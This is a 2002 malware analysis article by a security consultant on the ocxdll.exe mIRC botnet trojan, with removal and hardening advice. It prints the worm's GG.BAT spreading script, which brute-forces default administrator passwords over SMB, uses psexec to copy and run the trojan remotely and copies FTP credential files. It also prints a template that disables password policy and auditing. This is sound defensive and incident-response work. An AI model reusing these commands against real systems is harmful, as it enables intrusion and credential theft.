mIRC (port 445) Trojan Analysis
|Trojan Analysis||Security Resources||Spoof MAC Address|
mIRC Virus / Worm / Trojan Analysis (ocxdll.exe, Taskmngr.exe, mdm.exe, "HideWindows Error")
URL of this article is: http://www.klcconsulting.net/mirc_virus_analysis.htm
KLC Consulting Security Team believes that this is a prototype, and the start of the malicious IRC BotNet Distributed Denial of Services (DDoS) revolution from the bad guys. This article will give you the fundamental understanding of how IRC type of BotNet DDoS Trojans spread themselves so quickly ...
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
- ocxdll.exe / mIRC Trojan Analysis Part 1
- ocxdll.exe / mIRC Trojan Analysis Part 2
- Trojan Removal and Protection tools
- Trojan Files List
- An analysis on another IRC worm/Trojan (Deloder), more malicious than ocxdll.exe
ocxdll.exe / mIRC Trojan Analysis posted on Google Discussion Group, Part 1:
More Analysis on ocxdll.exe virus: v. 1.1
Kyle Lai, CISSP, CISA
This is a SMB over TCP attack, using port 445. It looked for vulnerability in weak administrator id and passwords on the local Windows 2000 systems.
One of my clients also got infected with ocxdll.exe virus. After some detailed analysis, I have determined that it was a Trojan, deleted the detected registry entries, deleted the infected files, tightened the local administrator ID and password, restored the security policy by running "secedit.exe /configure" (from Microsoft) to restore the security policy (If they have a backup .sdb file, then just reapply the security policy would fix this part), added users /groups back to "Access this computer from the network" policy . The cause was due to bad security (admin ID and passwords), and firewall, and possibly a backdoor.
- Windows 2000, XP (same port, 445, but not tested yet). Security policies alteration was ONLY for Windows 2000 (and maybe on XP)
- Windows NT - might be infected as the "root problem" to spread the trojan, but it will not get this Trojan base on its re-distribution method. You probably want to look into this system to determine if there are any backdoors, Trojans, or if this system wascompromised in any way. It will not change security policies.
What did it do?
1. hide all programs it ran.
2. Run mIRC client with random usernames listed in mdm.scr with more random characters
3. open backdoor, port 60609
4. It ran the bot (robot) scripts in the following order, which means they contained malicious automated instructions.
5. Replace security policy settings using Microsoft security editor (SecEdit.exe/configure) command and reset the security policy to default settings, and replace some additional security settings using the TFT8675 file. This is done in quiet mode so itprobably only flashed the command line window very quickly.
6. It scans for 25 IP's and then start running "GG.BAT". GG.BAT is the REAL program that started the hacking.
7. It tries to hack into the system using the following user ID and password. If you don't have these user id and passwords, maybe you are just infected with 1 system, and it could not spread via this Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator id and passwords, then probably these systems were hacked successfully. It copied the Trojan OCXDLL.EXE to the compromised systems. If file were there, copy it anyway, and do it quietly. (using psexec.exe -c -f -d)
9. Run the OCXDLL.EXE without any delay (psexec.exe -d), which extracted the 17 files that are in this self-extracted file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat"
and "c:\progra~1\ws_ftp\ws_ftp.ini" to
(maybe get the configuration from the bot?)
11. Start the "taskmngr.exe" which was really a Mirc.EXE, an irc client.
12. The scripts were kicked in to HIDE the mirc window, so you can ONLY see it in the process. You will see "taskmngr.exe" (NOT taskmgr.exe, which is the REAL task manager)
13. xvpll.hlp reports Trojan status back to the
hacker. Either attempt failed or attempt successful.
Disclaimer: The irc bot scripts have not fully analyzed. This is what I understood so far. The removal instructions WILL remove the trojan.
This may be a random attack. However, there is a file, ncp.exe involved, which is the NetCat program. This program allows the hackers to gain full control to your system.
1. Best-case scenario is that it was a random attack by the Trojans, and no sensitive data were lost. Your systems may be used as a zombie for Distributed Denial of Service attacks.
2. Worst-case scenario is that they have controlled your system and implemented something new that are not yet detected.
3. The hacker has captured your IP address and
knows that you were vulnerable because the Trojan actually reported back
to him/her. They have the account they successfully compromised,
and they *could* possibly got a copy of users and passwords on that
system, and *maybe* the credit card info if you shop online.
How to remove the Trojan:
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe and dll16.ini
(created when running mirc.exe)
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
seced.bat is a decoy. This file was never used. The real instruction for updating the configuration was mentioned in item #5. v.exe is actually srvany.exe, which is another decoy. It was never used.
2. Hkey local
remove "taskmngr.exe" (this starts mirc client program during the
3. Change the LOCAL Administrator password on ALL Systems! This
includes Windows 2000 PROESSIONAL! Make sure the new passwords are
strong passwords! Use mix of Uppercase, Lowercase, numbers, and
non-alphanumeric, i.e. _,+,=,), ? for your newpasswords, and make sure
the passwords are NOT similar to the administrator ID in any way. For
example, "Administrator123" is a very bad password, even it has mix
cases and alphanumeric.
4. If possible, change Administrator login ID to a different user_id. This will stop the initial user_id guessing. (This will not stop the more sophisticated hackers)
5. Restore the default security policy by
restoring the basic Microsoft default security template. The following
instruction for restoring basic default security template is from the
USENET posting by Edward Alfert (firstname.lastname@example.org) under topic
"Solution to mIRC and Secedit Virus Networking Problems." in
microsoft.public.scripting.virus.discussion.. More info on Microsoft
Security configuration and analysis can be found at
Here are the instructions from Edward Alfert.
1) use the backup security database template to restore the system to its original microsoft defaults. (NOTE...if you upgrade from a previous OS, this default may not be the default you are used to)...
Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log /verbose
2) copy /winnt/security/database/secedit.sdb to /winnt/security/database/secedit-check.sdb
you need to do this because you can't run step #3 against the original secedit.sdb
3) click on start, run, type mmc and click ok
4) click Console menu, then Add/Remove Snap-In
5) click Add, then double click on "Security and Configuration Analysis" and "Security Templates", then click close, and ok.
6) right click on "security and configuration analysis" and click on "open database"... browse to /winnt/security/database/secedit-check.sdb and select it.
7) right click on "security and configuration analysis" and seclect "analyzie computer now"
8) browse throught the directory structure and you will see that the computer is currently configured differently..
Make changes as appropriate for your environment.
For example, a very important option that is
probably missing (as caused by the trojan) is that nobody is allowed to
logon to the computer via the network).
6. Goto start -> programs -> administrative tools -> Local SecurityPolicy, click on
"User Rights Assignments", and add users and groups back into the policy. "Access this
computer from the network". The default setting is:
c. BACKUP OPERATORS
d. POWER USERS
g. IUSR_[ SYSTEM_NAME]
7. You MUST go through the security policies and make sure proper access were restored. You or some of your applications might have specific rights settings prior to the compromise, and the user/group privilage/rights need to be reset if necessary.
8. You probably have seen a strange SID that was added by the trojan in the "Logon Locally" policy. Remove the user SID. The SID there does NOT mean the trojan created a user. It was in the security template on TFTP8675 file. You can see it on the bottom of this document.
1. Tighten your Firewall and lock down the ports and ACL, BOTH inside to outside, and outside to inside. Make sure port TCP/UDP 445 is blocked both inbound and outbound on the firewall.
2. If possible, Rename your administrator user id to something else, and create a user id called "Administrator" with NO GROUPS associated with it. This will allow you to monitor anyone from trying to use the "Administrator" login.
3. Setup the security event log. Log successful
and failed Logon/Logoff to audit system access. Make sure to monitor the
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
(this starts mirc client program during the windows startup) When MIRC client started running, it ran the scripts in dll32nt.hlp,which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+tftp8675 /quiet". This meant
"configure your system setting with the existing security policy in secedit.sdb, plus the additional settings in tftp8675". It basically removed many security restrictions, remove all audits for the systems, and of course remove all users in the "Local Users allowed from the net".
OCXDLL.EXE is a self-extracted file that included 17 files. It is a Trojan/worm. In the dll32nt.hlp, it has an instruction to do IP scan, and store the 25 IP address it found. Mostly likely it scanned the subnet and file servers that were connected to the compromised system at that time. Then the Trojan has an instruction at the end to run
GG.BAT, which is the instruction to attack the 25 IP's it just found. Then the process started all over again.
Here are the files that were extracted from
Here is the GG.BAT text:
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini
psexec \\%1 -d taskmngr.exe
from SysInternals, here is the description of what the PSEXEC parameters do:
-c = Copy the specified program to the remote system for execution. If you omit this option then the application must be in the system's path on the remote system.
-f = Copy the specified program to the remote system even if the file already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for non-interactive applications.
List from TFTP8675:
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551
secreatepagefileprivilege = *S-1-5-32-544
sedebugprivilege = *S-1-5-32-544
seincreasebasepriorityprivilege = *S-1-5-32-544
seincreasequotaprivilege = *S-1-5-32-544
seloaddriverprivilege = *S-1-5-32-544
senetworklogonright = Microsoft
seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547
seremoteshutdownprivilege = *S-1-5-32-544
serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551
sesecurityprivilege = *S-1-5-32-544
sesystemenvironmentprivilege = *S-1-5-32-544
sesystemprofileprivilege = *S-1-5-32-544
sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547
setakeownershipprivilege = *S-1-5-32-544
ocxdll.exe / mIRC Trojan Analysis posted on Google Discussion Group, Part 2:
More Analysis on IRC Virus/Trojan Part 2: By
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
First of all, I want to say that I have nothing against Microsoft. I
am just presenting my analysis.
This analysis is based on my examination of the IRC Trojan/virus as
referenced in Microsoft Knowledge Base Article - Q328691; however, I
am not to be held responsible for the information provided. Also, I
have not researched any of the previous IRC/flood Trojan/viruses;
therefore, I am not knowledgeable in all aspects of that topic. If
you think the information, in this posting, is not accurate, please
send me an email.
This IRC Trojan/virus is vaguely similar to the earlier IRC/flood Trojan/virus. However, this time it takes advantage of weak computer systems security and performs a denial of service (DoS) attack. The vulnerability is typically caused by the lack of corporate security awareness.
Just some comments to Microsoft's response:
1. It uses port 445, which is SMB over TCP for attack. It doesn't use port 139, so NT4 is not vulnerable to this particular Trojan. However, port 139 is another typical hackers' target. Make sure your firewall is locked down. If you don't have a firewall, get one!
2. OCXDLL.EXE is a self-extracting executable
containing 17 files. To totally remove the Trojan, you can read my
original analysis where I listed all the files that are
Again, I can't tell if any files were added/deleted by the hackers for all of you out there. Reason: Once the hacker(s) compromised your machine(s), they own your entire system(s).
3. ncp.exe was included in ocxdll.exe. ncp.exe is actually the NetCat program, which is one of hacker's favorite tools. Microsoft did not identify this tool.
4. mt.exe was another program that requires
cygwin.dll. If you use Linux emulator via Cygwin, then this file would
exist on your system.
In discussion with Symantec, one analyst said "mt.exe is just a rather old Unix bot named knight.c that has been recompiled to use cygwin and run on Windows. This is basically a DdoS bot." However, I cannot confirm this because I have never dealt with it before. In the scripts, I did not see any evidence of mt.exe being called, however, I wouldn't rule out if the hacker executed this program remotely.
5. Microsoft said in the article Q328691 "NOTE: Paths to the files are not listed because they may vary." This statement is correct, however, probably 99% (just a guess) of the people setup with the default Windows 2000 configuration, which will leave you at "\WINNT\SYSTEM32", or. I suspect that ocxdll.exe were copied to the folder where "services.exe" is located because when I tried to run the psexec.exe similar to the ones in the script, it started the process "services.exe" on the remote system, followed by "psexesvc.exe", then followed by "services.exe". Guys, I didn't have time to try it out and if you can, keep me updated with your test results. I can't find psexesvc.exe on my system though? PSEXEC.EXE can be downloaded from Sysinternals. (http://www.sysinternals.com/ntw2k/freeware/psexec.shtml)
a. Download psexec.exe and save it at c:\test\.
b. Create a file called c:\test\test.bat with the following 2 lines Echo done testing > test-1.txt
c. Type ( Net Use \\[computer_ip]\IPC$
"[password]" /user:[administrator id]) to connect to the
remote computer as a system admin.
d. Type in "psexec \\[remote-system] -f -c -d test.bat -o" (to examine where the files are copied to.)
e. Goto remote system, "cd %systemroot%\system32", search for test*.* and you should find:
f. Open test-1.txt, and you will see the following line in the file, which proves that "test.bat" has been executed: "done testing"
g. This showed basically how psexec.exe work, and how dangerous it could be used when it's on the hacker's hand? psexec.exe copied the test.bat file over to the remote system, and then executed right after it was copied.
6. It tried to create a filelist of each
filetype with the following format .MPG, .AVI, .ASF, .RAR, .ZIP, .CUE.
These instructions are in httpsearch.ini. Since the machines I examined
have this file extracted from ocxdll.exe in 8.3 format ( "httpsear.ini"),
I don't believe this script was executed. Therefore, I did not see files
You probably want to check these files anyway though?
7. On my previous analysis, there is the
content of TFTP8675, which was the actual security template that was
applied to the security settings. This template actually changed user
permissions/rights policies. There are 3 major discoveries:
a. If you compare the Basic Microsoft default templates that ship with Windows 2000, this hacker used the exact basic Microsoft template, but added the [Permission Rights] section of the security template.
b. It trys to assign guest the right to
"logon locally". The entry was (seinteractivelogonright =
*S-1-5-21-1960408961-1637723038-1801674531-501 is the guest user SID it tried to add to the system ("501" at the last section of the SID indicates the Guest account). On the systems I examined, the SID value did not change when it was spreading, which meant guest accounts were not added successfully.
c. The part where it replaced the "Access this computer from the network" policy is (senetworklogonright = Microsoft). I noticed that the designer of this Trojan/virus/malware used SID to assign user rights besides this one? I think he/she is trying to make a point (?)
I don't think there can be a conclusion on what's lost if the systems were compromised. However, we can be sure that port 445 is open on many Windows 2000 and XP systems out there, which are not protected, and a lot of people out there are not security conscious on their Windows 2000 and XP systems, which require a little bit more technical skills to lock down the systems.
I highly recommend that system administrators follow the Microsoft security guidelines on hardening their Windows-based environment.
I also, would suggest that everyone infected by a Trojan/virus run some anti-Trojan programs in addition to the Anti-Virus software. Anti-Trojan programs like Anti-Trojan (http://www.anti-Trojan.net), Pest Patrol (http://www.pestpatrol.com), and others to ensure there are NO Trojan/hacker tools on your systems, which are sometimes missed by Anti-virus programs.
Besides anti-Trojan software, you probably should to run something like Ad-Aware (http://www.lavasoftusa.com/) to remove the adware that were downloaded unintentionally when you are surfing the web?
I hope "Internet Security" is not oxymoron.
Here are some free software utilities that can help you fight the Trojan and intrusions. If you use these utilities, make sure you get the latest updates regularly:
1. Make sure you have the latest Anti-Virus definitions that downloaded from your anti-virus software vendor. If you don't have one, here is a free one: http://www.grisoft.com
2. Make sure you get an Anti-Trojan software on top of the Anti-Virus software. Many Anti-Virus software does not detect Trojans and Hacker software that was installed during an intrusions. Anti-Virus software does not detect hacker software because it could be used ligitimately by security professionals... A free and Great one is Swat-IT by Lockdown Corp: http://lockdowncorp.com/bots/downloadswatit.html
3. Get Ad-Aware software, which is for removing advertising software that web advertisers install on your systems without your acknowledgement while you are surfing on the Web... This is a free software too: http://www.lavasoftusa.com/software/adaware/
4. Get a Firewall for your computers if you have not get one. Here is a very simple to use firewall software: http://www.zonealarm.com
This particular mIRC Virus/Trojan has spread across the world around the end of August, 2002
Base on the information from the victims, a variant of the original OCXDLL.EXE had attacked again
around October, 23, 2002 and November 13, 2002..
I have heard there is a new variant is out there, and the new name for
taskmngr.exe is now TASK32.EXE. (as of 11/13/2002).
This is reported by several victims in the newbie.org- taskmngr.exe discussion group I participated.
This virus took advantage of the Microsoft SMB over TCP (Port 445), which uses NetBios names.
It attempted to spread to Windows 2000 Professional, Windows 2000 Servers and possibly Windows XP with
weak and guessable administrator account and passwords:
(passwords used by DeLoder-A worm/Trojan)
Microsoft got caught up with the original OCXDLL.EXE Virus/Trojan and issued a "Hacker
on 8/30/2002. The original Microsoft analysis was very vague and it got heavily criticized by the
public. Microsoft re-issued the analysis and titled "MIRC Trojan-Related Attack Detection and
Repair" on 9/6/2002 and removed the original article. Below are some of the references regarding
to this mIRC Virus/Trojan/Malware.
I am still helping out in the discussion group: newbie.org under "Taskmngr.exe". There you can see the discussion and track the Trojan variants.
Additional resources on recovery:
Trojan Ports list:
Compromised Computer Identification and Fixing Guidelines by Allen Chang at UC Berkeley
Additional resources on Trojan Horse:
mIRC Trojan Variants:
IETF Assigned Ports:
Copyright © 2002-2011 KLC
All rights reserved.